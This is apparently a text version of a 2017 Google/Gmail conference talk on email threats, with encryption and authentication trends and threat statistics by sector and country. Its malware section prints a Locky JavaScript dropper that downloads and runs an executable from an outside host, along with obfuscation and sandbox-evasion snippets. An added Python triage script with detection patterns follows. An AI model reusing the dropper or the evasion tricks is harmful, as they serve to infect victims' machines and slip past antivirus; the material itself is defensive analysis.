Targeted Attacks Against Corporate Inboxes - a Gmail Perspective - RSA 2017
Elie Bursztein with the help of many Googlers @elie
Targeted Attacks Against Corporate Inboxes - a Gmail Perspective
SESSION ID: HT-R11
g.co/research/protect
1.X BILLION USERS
Stopping hundreds of billions of attacks every week
A corporate inbox receives 4.3x more malware than an end-user inbox
[Bar chart: 1x vs. 4.3x]
Science-related German companies get 9.6x more phishing attempts than their US counterparts
[Bar chart: 9.6x vs. 1x]
Highlight how various groups of Gmail users exhibit different threat profiles
Global trends
Organization trends
Countries trends
Global trends
Spam
Phishing
Impersonation
Malware
Interception
Spam
Google embraces deep learning
Android, Gmail, Photos, Maps, NLP, Robotics research, Speech, Translation, YouTube … many others ...
Deep-learning for photos auto-tagging
User photo → Deep Convolutional Neural Network → Automatic Tag: “ocean”
Deep learning powers Google Photos search
“Wow, the new Google photo search is a bit insane. I didn’t tag those”
“Google photo search is awesome. Searched with keyword drawing to find all my scribble at once :D”
Tensor power unit
We do deep-learning efficiently and at Google scale thanks to dedicated ASICs
https://cloudplatform.googleblog.com/2016/05/Google-supercharges-machine-learning-tasks-with-custom-chip.html
Using deep learning allows us to stay ahead of spammers
Interception
Encrypting email in transit with STARTTLS
Sender (Alice)
Mail server (smtp.source.com)
Eavesdropper (Eve)
Mail server (smtp.destination.com)
Recipient (Bob)
80% 87%
Transparency report - June 2014
https://googleblog.blogspot.com/2014/06/transparency-report-protecting-emails.html
Transparency report
[Chart: fraction of email encrypted, inbound traffic and outbound traffic, 2013-12 to 2016-12; y-axis from 0% to 90%]
Broken lock UI - February 2016
Broken lock UI
[Chart: fraction of email encrypted, inbound traffic and outbound traffic, 2013-12 to 2016-12; y-axis from 0% to 90%]
Increasing encryption visibility helped speed up adoption
Next: SMTP strict transport security
Prevent MITM using rogue certificate
Like HTTPS pinning for email
Coming soon!
Industry-wide effort via MAAWG and IETF
Google, Microsoft, Yahoo, Comcast are all on board
SMTP Strict Transport security is the next big milestone
Impersonation
DKIM: Sign your email cryptographically
SPF: Specify which email servers to trust
DMARC: Define what to do with fake emails
Surfacing authentication status
Authenticated Not authenticated
https://blog.google/products/gmail/making-email-safer-for-you-posted-by/
Authentication over-time
https://security.googleblog.com/2013/12/internet-wide-efforts-to-fight-email.html
Dec 2016 Dec 2015 Dec 2014
5.8% 2.8% 1.8%
Most emails are authenticated
DMARC adoption is too low
Phishing
Targeted financial phishing is on the rise
Malware
Ransomware largest malware threat
Locky seen by Gmail vs Internet - May 2016
Normalized by number of emails; a hash is potentially used in many emails
Locky is part of a complex ecosystem
Locky
Dridex
Locky vs Dridex daily pattern - May 2016
Locky
Dridex
Rise of JavaScript droppers as a means to evade anti-virus
Anatomy of a Locky dropper
```javascript
var shell = new ActiveXObject("WScript.Shell");
var tmpDir = shell.ExpandEnvironmentStrings("%TEMP%");
// fetch the payload
var xhr = new ActiveXObject("MSXML2.XMLHTTP");
xhr.open("GET","http://shady.ru/payload.exe",false);
xhr.send(null);
var payload = xhr.responseBody;
// write payload to disk
var writer = ActiveXObject("ADODB.Stream");
writer.open();
writer.type = 2;
writer.write(payload);
writer.SaveToFile(tmpDir + "\\payload.exe");
// execute the payload
shell.Run(tmpDir + "\\payload.exe", "", false);
```
Get temp directory
Fetch payload
Write payload to disk
Execute payload
Locky May 5th attack
20 000 m/h
30 000 000 m/h
[Chart: number of emails blocked, internal detector vs. commercial anti-virus, hourly from 04-05 23:00 to 04-06 18:00; y-axis from 1x to 1000x]
Evasion attempts via file type switch
AV DDOS exploit via malicious comments
Comment sample
JavaScript obfuscation - Property access
```javascript
String.prototype.foo = function() { return this.substr(1,1); };
namespaces = ('a', 'b', "ip");
select = "W";
fireWith = "gt".foo();
origName = (fireWith.split((1,"b")), "Scr");
mozMatchesSelector = (((18 ^ rbracket), (1332 / delegateTarget)), (((162, rscriptType) / (13 & preFilter)), this));
bind = mozMatchesSelector[select + origName + namespaces + fireWith];
…
subtract = bind[noConflict + finalDataType + percent](define + focusin + clientTop);
…
slideUp = subtract[mouseenter + andSelf + isReady + fireWith + matchesSelector + matchIndexes](JSON + ownerDocument) + file + now;
```
select + origName + namespaces + fireWith evaluates to "WScript"
Sandbox detection via timer check
```javascript
var t1 = new Date().getMilliseconds();
WScript.Sleep(10);
var t2 = new Date().getMilliseconds();
if (t2-t1 <= 10) WScript.Quit();
```
HoneyClients don't sleep
Emulation detected!
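A static triage pass over script attachments, as an added example that is not part of the original slides: it looks for the four dropper stages, the sleep timing check and the computed property access shown above. The function name, the threshold and the sample scripts are constructed for illustration, and the host name is a placeholder.

```python
import re

# Added example (not from the talk). Stage markers follow the dropper on the slide.
STAGES = {
    "get_temp_dir": re.compile(r"ExpandEnvironmentStrings\s*\(\s*[\"']%TEMP%[\"']", re.I),
    "fetch_payload": re.compile(r"ActiveXObject\s*\(\s*[\"']MSXML2\.XMLHTTP", re.I),
    "write_to_disk": re.compile(
        r"ActiveXObject\s*\(\s*[\"']ADODB\.Stream[\s\S]*?\.SaveToFile\s*\(", re.I),
    "execute": re.compile(r"\.Run\s*\(", re.I),
}
# Two clock reads around WScript.Sleep, followed by WScript.Quit.
TIMER_CHECK = re.compile(
    r"new\s+Date\(\)[\s\S]{0,200}?WScript\.Sleep\s*\("
    r"[\s\S]{0,200}?new\s+Date\(\)[\s\S]{0,200}?WScript\.Quit", re.I)
# Member access whose name is assembled by concatenation: obj[a + b + c].
COMPUTED_ACCESS = re.compile(r"\[\s*[\w$\"']+(?:\s*\+\s*[\w$\"']+)+\s*\]")
COMPUTED_THRESHOLD = 3  # ASSUMPTION: chosen for this illustration only


def triage(script: str) -> dict:
    """Return the static indicators found in one script attachment."""
    stages = [name for name, rx in STAGES.items() if rx.search(script)]
    timer = bool(TIMER_CHECK.search(script))
    computed = len(COMPUTED_ACCESS.findall(script))
    reasons = []
    if {"fetch_payload", "write_to_disk", "execute"} <= set(stages):
        reasons.append("download-write-execute chain")
    if timer:
        reasons.append("sleep timing check")
    if computed >= COMPUTED_THRESHOLD:
        reasons.append("computed property access")
    return {"stages": stages, "timer_check": timer, "computed_access": computed,
            "reasons": reasons, "suspicious": bool(reasons)}


# Constructed samples. PLAIN is abridged from the slide, with a placeholder host.
PLAIN = r'''
var shell = new ActiveXObject("WScript.Shell");
var tmpDir = shell.ExpandEnvironmentStrings("%TEMP%");
var xhr = new ActiveXObject("MSXML2.XMLHTTP");
xhr.open("GET","http://payload-host.invalid/payload.exe",false);
var writer = ActiveXObject("ADODB.Stream");
writer.SaveToFile(tmpDir + "\\payload.exe");
shell.Run(tmpDir + "\\payload.exe", "", false);
'''
# Abridged from the property-access slide: no stage string appears literally.
OBFUSCATED = '''
bind = mozMatchesSelector[select + origName + namespaces + fireWith];
subtract = bind[noConflict + finalDataType + percent](define + focusin + clientTop);
slideUp = subtract[mouseenter + andSelf + isReady + fireWith](JSON + ownerDocument);
'''
TIMER = '''
var t1 = new Date().getMilliseconds(); WScript.Sleep(10);
var t2 = new Date().getMilliseconds(); if (t2-t1 <= 10) WScript.Quit();
'''
# A harmless administrative script (constructed).
BENIGN = '''
var fso = new ActiveXObject("Scripting.FileSystemObject");
WScript.Echo("free space: " + fso.GetDrive("C:").FreeSpace);
'''

if __name__ == "__main__":
    samples = {"plain": PLAIN, "obfuscated": OBFUSCATED, "timer": TIMER, "benign": BENIGN}
    for name, script in samples.items():
        result = triage(script)
        print(f"{name:11s} stages={result['stages']} reasons={result['reasons']}")
```

String matching finds no stage at all in the obfuscated sample; only the count of computed member accesses flags it.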
OS check via the use of JScript-specific behavior
```javascript
b();
var greet = (function b() { }, "hello");
```
b is defined and hoisted only in JScript
```javascript
b.foo();
var greet = (function b() { }, "hello");
function b.prototype.foo() { }
```
not valid ES3/5/6
```javascript
http.option(1) = true
```
not valid ES6
Organizational trends
Professional inboxes are 6.2x more targeted by phishing and 4.3x more targeted by malware than end-user inboxes
Spam: Gmail 1.0x, GSuite 0.4x
Phishing: Gmail 1.0x, GSuite 6.2x
Malware: Gmail 1.0x, GSuite 4.3x
Organization type insights
A corporate inbox is 3.2x more targeted by phishing email than an EDU inbox
Education: 1.0x
Government related: 1.8x
Non Profit: 1.2x
Company: 3.2x
Non-profit inboxes are 2.3x more targeted by malware than corporate inboxes
Education: 2.1x
Government related: 1.3x
Non Profit: 2.3x
Company: 1.0x
A corporate inbox receives 3.1x more encrypted emails than an EDU inbox
Education: 1.0x
Government related: 1.2x
Non Profit: 1.3x
Company: 3.1x
Company sectors insights
Entertainment, IT and housing related companies are the most targeted by spam as of Q1 2017
Utilities: 1.0x
Finance and Insurance: 1.3x
Natural resources: 1.5x
Manufacturing: 1.5x
Administrative: 1.5x
Wholesale Trade: 1.7x
Management: 1.8x
Transportation: 2.2x
Science: 2.5x
Construction: 2.6x
Accommodation & Food: 2.6x
Health: 2.6x
Retail Trade: 2.7x
Housing: 4.3x
Information Technology: 4.9x
Entertainment: 6.1x
Finance, Arts and IT related companies are the most targeted by phishing as of Q1 2017
Utilities: 1.0x
Finance and Insurance: 8.6x
Natural resources: 1.2x
Manufacturing: 1.8x
Administrative: 1.6x
Wholesale Trade: 1.9x
Management: 1.4x
Transportation: 4.9x
Science: 2.8x
Construction: 1.8x
Accommodation & Food: 1.5x
Health: 3.3x
Retail Trade: 2.8x
Housing: 4.3x
Information Technology: 6.9x
Entertainment: 7.6x
Volume of phishing attempts depends on country and sector
[Chart: Finance sector and IT sector, by country]
Countries: France, Canada, USA, India, UK, Japan, Brazil
Bar labels: > 10x, 1.0x, 1.8x, 2.8x, 3.2x, 3.2x, 4.4x, 5.8x, 1.9x, 1.4x, 1.2x, 1.0x, 1.7x, 1.2x
Entertainment and utilities related companies are the ones that received the most encrypted emails as of Q1 2017
Utilities: 1.3x
Finance and Insurance: 1.0x
Natural resources: 1.2x
Manufacturing: 1.2x
Administrative: 1.2x
Wholesale Trade: 1.2x
Management: 1.3x
Transportation: 1.3x
Science: 1.3x
Construction: 1.1x
Accommodation & Food: 1.3x
Health: 1.2x
Retail Trade: 1.2x
Housing: 1.1x
Information Technology: 1.2x
Entertainment: 1.3x
Real estate is by far the sector that is the most targeted by malware as of Q1 2017
Science: 1.0x
Health Care: 1.1x
Wholesale Trade: 1.2x
Entertainment: 1.3x
Finance and Insurance: 1.4x
Manufacturing: 1.7x
Information Technology: 1.7x
Administrative: 2.0x
Mining: 2.2x
Accommodation and Food: 2.2x
Retail Trade: 2.3x
Utilities: 2.4x
Construction: 3.6x
Transportation: 4.5x
Real Estate: > 10x
Countries trends
EU is not at the forefront of email security
Country: STARTTLS / DKIM
USA: 1.2x / 1.4x
Japan: 1.1x / 1.0x
Brazil: 1.0x / 1.6x
India: 1.2x / 1.6x
UK: 1.1x / 1.3x
France: 1.0x / 1.4x
Canada: 1.1x / 1.5x
Germany: 1.1x / 1.2x
Korea: 1.1x / 1.6x
Australia: 1.1x / 1.5x
India and Japan have the most spammed inboxes as of Q1 2017
USA: 2.0x
Japan: 4.1x
Brazil: 2.7x
India: 3.8x
UK: 1.3x
France: 1.0x
Canada: 1.6x
Germany: 1.2x
Korea: 1.8x
Australia: 1.1x
The largest spammers in the world target other countries
1. USA
2. Germany
3. France
4. Japan
5. United Kingdom
6. Romania
7. Spain
8. Brazil
9. Canada
10. Russia
Japan inboxes are heavily targeted by phishing as of Q1 2017.
USA: 2.1x
Japan: 5.9x
Brazil: 3.5x
India: 1.7x
UK: 1.9x
France: 1.0x
Canada: 3.0x
Germany: 1.6x
Korea: 1.1x
Australia: 1.7x
Recap
Deep-learning is providing the edge we need to combat email abuse
Transparency helps drive adoption of security technologies through the ecosystem
Each organization has a unique threat profile that should be considered when prioritizing defenses
Thanks g.co/research/protect